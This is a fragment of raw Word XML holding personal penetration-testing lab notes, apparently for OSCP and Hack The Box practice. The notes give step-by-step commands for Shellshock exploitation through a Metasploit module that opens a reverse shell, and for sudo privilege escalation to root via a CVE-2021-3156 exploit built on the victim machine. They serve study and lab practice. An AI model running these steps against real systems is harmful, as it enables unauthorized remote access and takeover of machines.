          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example from a while ago that was from HTB and involves a file within /cgi-bin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in URL enumeration, do another web enumeration but only for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and use the following flags TO FIND SOME SCRIPT. We find a script since we hope it invokes GNU Bash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e .cgi,.sh,.pl,.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1131"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is for ffuf. If you use GoBuster, use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once you find a SCRIPT, use the metasploit module: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/multi/http/apache_mod_cgi_bash_env_exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHost [local_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS [set target IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set TARGETURI [path to script without the IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, /login or maybe just / if you don't want any path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003000">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003001">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003002">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03">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003004">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003005">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fv19khz980st" w:id="425"/>
      <w:bookmarkEnd w:id="425"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003007">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo version 1.8.31 was exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.245. We also saw it on .143 of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but they didn't allow us to run "make" on that machine, and when we compiled on local kali and then exported the executable, it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in OSCP-B .149 but idk if it works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Sudo Version 1.8.31 using CVE-2021-3156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1063">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/CptGibbon/CVE-2021-3156</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, you have to download shellcode.c, exploit.c, and Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000300F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download this ON the victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then get them all into same directory in the SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1196"/>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make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003013">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1196"/>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./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have root!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003015">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003016">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003017">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check sudo version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003018">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the version of the sudo because as shown in the Paper HTB, it was vulnerable to sudo exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, in the case of Paper HTB, the sudo -V told us the version but after googling, I couldn't find the CVE that they wanted. You actually had to use linpeas to find the CVE vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, this was my first sudo vulnerability and a time where linpeas was the only solution, so make sure to use that!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000301E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
